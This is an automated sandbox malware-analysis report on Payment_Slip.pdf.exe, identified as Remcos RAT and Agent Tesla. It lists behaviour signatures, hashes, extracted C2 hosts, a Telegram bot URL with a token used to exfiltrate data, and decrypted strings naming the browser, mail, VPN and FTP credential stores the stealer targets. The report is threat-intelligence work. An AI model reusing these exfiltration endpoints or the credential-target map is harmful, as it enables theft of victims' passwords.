Windows Analysis Report
Payment_Slip.pdf.exe

Overview

General Information

Sample name: Payment_Slip.pdf.exe
Analysis ID: 1639467
MD5: 90133947ec6add62c5d9b23c475f602f
SHA1: 7cf9a2a412aa3bb5f78f19ba419551faad4758f2
SHA256: a35234d3e33acbb7e53abaec38ced3a45f6df0ad5ee17ba52b49478d0418f1da
Tags: exe, user-BastianHein

Detection

Remcos, AgentTesla
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates multiple autostart registry keys
Delayed program exit found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection

Source: C:\Users\user\AppData\Local\Temp\conserver.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["ratianaana701.bounceme.net:9373:1", "milala.duckdns.org:9373:1"], "Assigned name": "MARCH 15", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-TWFFFD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: 12.0.host.exe.240000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage?chat_id=5559571239"}
Source: host.exe.4860.12.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage"}
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\conserver.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\host.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe ReversingLabs: Detection: 87%
Source: Payment_Slip.pdf.exe Virustotal: Detection: 45%
Source: Payment_Slip.pdf.exe ReversingLabs: Detection: 50%
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 12.0.host.exe.240000.0.unpack String decryptor: /log.tmp
Source: 12.0.host.exe.240000.0.unpack String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>[
Source: 12.0.host.exe.240000.0.unpack String decryptor: yyyy-MM-dd HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack String decryptor: ]<br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack String decryptor: application/zip
Source: 12.0.host.exe.240000.0.unpack String decryptor: Time:
Source: 12.0.host.exe.240000.0.unpack String decryptor: MM/dd/yyyy HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>User Name:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>Computer Name:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>OSFullName:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>CPU:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>RAM:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: IP Address:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack String decryptor: New
Source: 12.0.host.exe.240000.0.unpack String decryptor: MM/dd/yyyy HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack String decryptor: IP Address:
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: https://api.ipify.org
Source: 12.0.host.exe.240000.0.unpack String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: false
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: false
Source: 12.0.host.exe.240000.0.unpack String decryptor: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
Source: 12.0.host.exe.240000.0.unpack String decryptor: 5559571239
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: mykksg
Source: 12.0.host.exe.240000.0.unpack String decryptor: mykksg.exe
Source: 12.0.host.exe.240000.0.unpack String decryptor: mykksg
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: false
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: Type
Source: 12.0.host.exe.240000.0.unpack String decryptor: XCrOSR
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Run
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <b>[
Source: 12.0.host.exe.240000.0.unpack String decryptor: ]</b> (
Source: 12.0.host.exe.240000.0.unpack String decryptor: )<br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: {BACK}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ALT+TAB}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ALT+F4}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {TAB}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ESC}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {Win}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {CAPSLOCK}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYUP}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYDOWN}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYLEFT}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYRIGHT}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {DEL}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {END}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {HOME}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {Insert}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {NumLock}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {PageDown}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {PageUp}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ENTER}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F1}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F2}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F3}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F4}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F5}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F6}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F7}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F8}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F9}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F10}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F11}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F12}
Source: 12.0.host.exe.240000.0.unpack String decryptor: control
Source: 12.0.host.exe.240000.0.unpack String decryptor: {CTRL}
Source: 12.0.host.exe.240000.0.unpack String decryptor: &amp;
Source: 12.0.host.exe.240000.0.unpack String decryptor: &lt;
Source: 12.0.host.exe.240000.0.unpack String decryptor: &gt;
Source: 12.0.host.exe.240000.0.unpack String decryptor: &quot;
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br><hr>Copied Text: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack String decryptor: logins
Source: 12.0.host.exe.240000.0.unpack String decryptor: IE/Edge
Source: 12.0.host.exe.240000.0.unpack String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Secure Note
Source: 12.0.host.exe.240000.0.unpack String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Web Password Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Credential Picker Protector
Source: 12.0.host.exe.240000.0.unpack String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 12.0.host.exe.240000.0.unpack String decryptor: Web Credentials
Source: 12.0.host.exe.240000.0.unpack String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Credentials
Source: 12.0.host.exe.240000.0.unpack String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Domain Certificate Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Domain Password Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Extended Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 00000000-0000-0000-0000-000000000000
Source: 12.0.host.exe.240000.0.unpack String decryptor: SchemaId
Source: 12.0.host.exe.240000.0.unpack String decryptor: pResourceElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pIdentityElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pPackageSid
Source: 12.0.host.exe.240000.0.unpack String decryptor: pAuthenticatorElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: IE/Edge
Source: 12.0.host.exe.240000.0.unpack String decryptor: UC Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: UCBrowser\
Source: 12.0.host.exe.240000.0.unpack String decryptor: Login Data
Source: 12.0.host.exe.240000.0.unpack String decryptor: journal
Source: 12.0.host.exe.240000.0.unpack String decryptor: wow_logins
Source: 12.0.host.exe.240000.0.unpack String decryptor: Safari for Windows
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 12.0.host.exe.240000.0.unpack String decryptor: <array>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <dict>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <data>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </data>
Source: 12.0.host.exe.240000.0.unpack String decryptor: -convert xml1 -s -o "
Source: 12.0.host.exe.240000.0.unpack String decryptor: \fixed_keychain.xml"
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Protect\
Source: 12.0.host.exe.240000.0.unpack String decryptor: credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: QQ Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: Tencent\QQBrowser\User Data
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Default\EncryptedStorage
Source: 12.0.host.exe.240000.0.unpack String decryptor: Profile
Source: 12.0.host.exe.240000.0.unpack String decryptor: \EncryptedStorage
Source: 12.0.host.exe.240000.0.unpack String decryptor: entries
Source: 12.0.host.exe.240000.0.unpack String decryptor: category
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: str3
Source: 12.0.host.exe.240000.0.unpack String decryptor: str2
Source: 12.0.host.exe.240000.0.unpack String decryptor: blob0
Source: 12.0.host.exe.240000.0.unpack String decryptor: password_value
Source: 12.0.host.exe.240000.0.unpack String decryptor: IncrediMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: PopPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmtpPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\IncrediMail\Identities\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Accounts_New
Source: 12.0.host.exe.240000.0.unpack String decryptor: PopPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmtpPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmtpServer
Source: 12.0.host.exe.240000.0.unpack String decryptor: EmailAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Eudora
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 12.0.host.exe.240000.0.unpack String decryptor: current
Source: 12.0.host.exe.240000.0.unpack String decryptor: Settings
Source: 12.0.host.exe.240000.0.unpack String decryptor: SavePasswordText
Source: 12.0.host.exe.240000.0.unpack String decryptor: Settings
Source: 12.0.host.exe.240000.0.unpack String decryptor: ReturnAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Falkon Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: \falkon\profiles\
Source: 12.0.host.exe.240000.0.unpack String decryptor: profiles.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 12.0.host.exe.240000.0.unpack String decryptor: profiles.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: \browsedata.db
Source: 12.0.host.exe.240000.0.unpack String decryptor: autofill
Source: 12.0.host.exe.240000.0.unpack String decryptor: ClawsMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Claws-mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \clawsrc
Source: 12.0.host.exe.240000.0.unpack String decryptor: \clawsrc
Source: 12.0.host.exe.240000.0.unpack String decryptor: passkey0
Source: 12.0.host.exe.240000.0.unpack String decryptor: master_passphrase_salt=(.+)
Source: 12.0.host.exe.240000.0.unpack String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \accountrc
Source: 12.0.host.exe.240000.0.unpack String decryptor: smtp_server
Source: 12.0.host.exe.240000.0.unpack String decryptor: address
Source: 12.0.host.exe.240000.0.unpack String decryptor: account
Source: 12.0.host.exe.240000.0.unpack String decryptor: \passwordstorerc
Source: 12.0.host.exe.240000.0.unpack String decryptor: {(.*),(.*)}(.*)
Source: 12.0.host.exe.240000.0.unpack String decryptor: Flock Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Flock\Browser\
Source: 12.0.host.exe.240000.0.unpack String decryptor: signons3.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: DynDns
Source: 12.0.host.exe.240000.0.unpack String decryptor: ALLUSERSPROFILE
Source: 12.0.host.exe.240000.0.unpack String decryptor: Dyn\Updater\config.dyndns
Source: 12.0.host.exe.240000.0.unpack String decryptor: username=
Source: 12.0.host.exe.240000.0.unpack String decryptor: password=
Source: 12.0.host.exe.240000.0.unpack String decryptor: https://account.dyn.com/
Source: 12.0.host.exe.240000.0.unpack String decryptor: t6KzXhCh
Source: 12.0.host.exe.240000.0.unpack String decryptor: ALLUSERSPROFILE
Source: 12.0.host.exe.240000.0.unpack String decryptor: Dyn\Updater\daemon.cfg
Source: 12.0.host.exe.240000.0.unpack String decryptor: global
Source: 12.0.host.exe.240000.0.unpack String decryptor: accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: account.
Source: 12.0.host.exe.240000.0.unpack String decryptor: username
Source: 12.0.host.exe.240000.0.unpack String decryptor: account.
Source: 12.0.host.exe.240000.0.unpack String decryptor: password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Psi/Psi+
Source: 12.0.host.exe.240000.0.unpack String decryptor: name
Source: 12.0.host.exe.240000.0.unpack String decryptor: password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Psi/Psi+
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Psi\profiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Psi+\profiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \accounts.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: \accounts.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: OpenVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\OpenVPN-GUI\configs
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\OpenVPN-GUI\configs
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\OpenVPN-GUI\configs\
Source: 12.0.host.exe.240000.0.unpack String decryptor: username
Source: 12.0.host.exe.240000.0.unpack String decryptor: auth-data
Source: 12.0.host.exe.240000.0.unpack String decryptor: entropy
Source: 12.0.host.exe.240000.0.unpack String decryptor: USERPROFILE
Source: 12.0.host.exe.240000.0.unpack String decryptor: \OpenVPN\config\
Source: 12.0.host.exe.240000.0.unpack String decryptor: remote
Source: 12.0.host.exe.240000.0.unpack String decryptor: remote
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVpn.exe*
Source: 12.0.host.exe.240000.0.unpack String decryptor: user.config
Source: 12.0.host.exe.240000.0.unpack String decryptor: //setting[@name='Username']/value
Source: 12.0.host.exe.240000.0.unpack String decryptor: //setting[@name='Password']/value
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: Private Internet Access
Source: 12.0.host.exe.240000.0.unpack String decryptor: %ProgramW6432%
Source: 12.0.host.exe.240000.0.unpack String decryptor: Private Internet Access\data
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Private Internet Access\data
Source: 12.0.host.exe.240000.0.unpack String decryptor: \account.json
Source: 12.0.host.exe.240000.0.unpack String decryptor: .*"username":"(.*?)"
Source: 12.0.host.exe.240000.0.unpack String decryptor: .*"password":"(.*?)"
Source: 12.0.host.exe.240000.0.unpack String decryptor: Private Internet Access
Source: 12.0.host.exe.240000.0.unpack String decryptor: privateinternetaccess.com
Source: 12.0.host.exe.240000.0.unpack String decryptor: FileZilla
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FileZilla\recentservers.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FileZilla\recentservers.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Server>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Host>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Host>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Host>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <User>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <User>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </User>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Pass>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Pass>
Source: 12.0.host.exe.240000.0.unpack String decryptor: CoreFTP
